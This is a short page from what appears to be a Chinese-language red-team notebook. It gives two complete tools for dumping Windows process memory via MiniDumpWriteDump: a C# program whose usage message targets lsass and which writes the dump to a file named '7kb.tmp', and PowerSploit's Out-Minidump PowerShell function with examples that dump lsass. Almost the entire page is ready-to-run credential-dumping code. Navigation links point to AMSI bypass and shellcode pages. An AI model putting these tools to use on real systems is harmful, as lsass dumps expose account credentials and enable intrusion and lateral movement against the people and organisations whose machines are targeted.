MiniDumpWriteDump

c#:
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
​
namespace MiniDumpWriteDump
{
    class Program
    {
        [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
        static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle OutFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);
​
        static void Main(string[] args)
        {
            try
            {
                Process[] process = Process.GetProcessesByName(args[0]);
                Console.WriteLine("Get Processes Handle is " + process[0].Handle);
                Console.WriteLine("Get Processes Id is " + process[0].Id);
                using (FileStream fs = new FileStream("7kb.tmp", FileMode.Create, FileAccess.ReadWrite, FileShare.Write))
                {
                    Console.WriteLine("Dump Status:" + MiniDumpWriteDump(process[0].Handle, (uint)process[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero));
                }
            }
            catch (Exception)
            {
                Console.WriteLine("MiniDumpWriteDump.exe lsass");
            }
        }
    }
}
ps1：
function Out-Minidump
{
<#
.SYNOPSIS
​
    Generates a full-memory minidump of a process.
​
    PowerSploit Function: Out-Minidump
    Author: Matthew Graeber (@mattifestation)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
​
.DESCRIPTION
​
    Out-Minidump writes a process dump file with all process memory to disk.
    This is similar to running procdump.exe with the '-ma' switch.
​
.PARAMETER Process
​
    Specifies the process for which a dump will be generated. The process object
    is obtained with Get-Process.
​
.PARAMETER DumpFilePath
​
    Specifies the path where dump files will be written. By default, dump files
    are written to the current working directory. Dump file names take following
    form: processname_id.dmp
​
.EXAMPLE
​
    Out-Minidump -Process (Get-Process -Id 4293)
​
    Description
    -----------
    Generate a minidump for process ID 4293.
​
.EXAMPLE
​
    Get-Process lsass | Out-Minidump
​
    Description
    -----------
    Generate a minidump for the lsass process. Note: To dump lsass, you must be
    running from an elevated prompt.
​
.EXAMPLE
​
    Get-Process | Out-Minidump -DumpFilePath C:\temp
​
    Description
    -----------
    Generate a minidump of all running processes and save them to C:\temp.
​
.INPUTS
​
    System.Diagnostics.Process
​
    You can pipe a process object to Out-Minidump.
​
.OUTPUTS
​
    System.IO.FileInfo
​
.LINK
​
    http://www.exploit-monday.com/
#>
​
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
        [System.Diagnostics.Process]
        $Process,
​
        [Parameter(Position = 1)]
        [ValidateScript({ Test-Path $_ })]
        [String]
        $DumpFilePath = $PWD
    )
​
    BEGIN
    {
        $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
        $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
        $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
        $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
        $MiniDumpWithFullMemory = [UInt32] 2
    }
​
    PROCESS
    {
        $ProcessId = $Process.Id
        $ProcessName = $Process.Name
        $ProcessHandle = $Process.Handle
        $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
​
        $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
​
        $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
​
        $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
                                                     $ProcessId,
                                                     $FileStream.SafeFileHandle,
                                                     $MiniDumpWithFullMemory,
                                                     [IntPtr]::Zero,
                                                     [IntPtr]::Zero,
                                                     [IntPtr]::Zero))
​
        $FileStream.Close()
​
        if (-not $Result)
        {
            $Exception = New-Object ComponentModel.Win32Exception
            $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
​
            # Remove any partially written dump files. For example, a partial dump will be written
            # in the case when 32-bit PowerShell tries to dump a 64-bit process.
            Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
​
            throw $ExceptionMessage
        }
        else
        {
            Get-ChildItem $ProcessDumpPath
        }
    }
​
    END {}
}
参考链接：
PowerSploit/Out-Minidump.ps1 at master · PowerShellMafia/PowerSploit
GitHub
​

AMSI - 以前

绕过AMSI

下一个 - Dump内存

Shellcode

最近更新 1yr ago

复制链接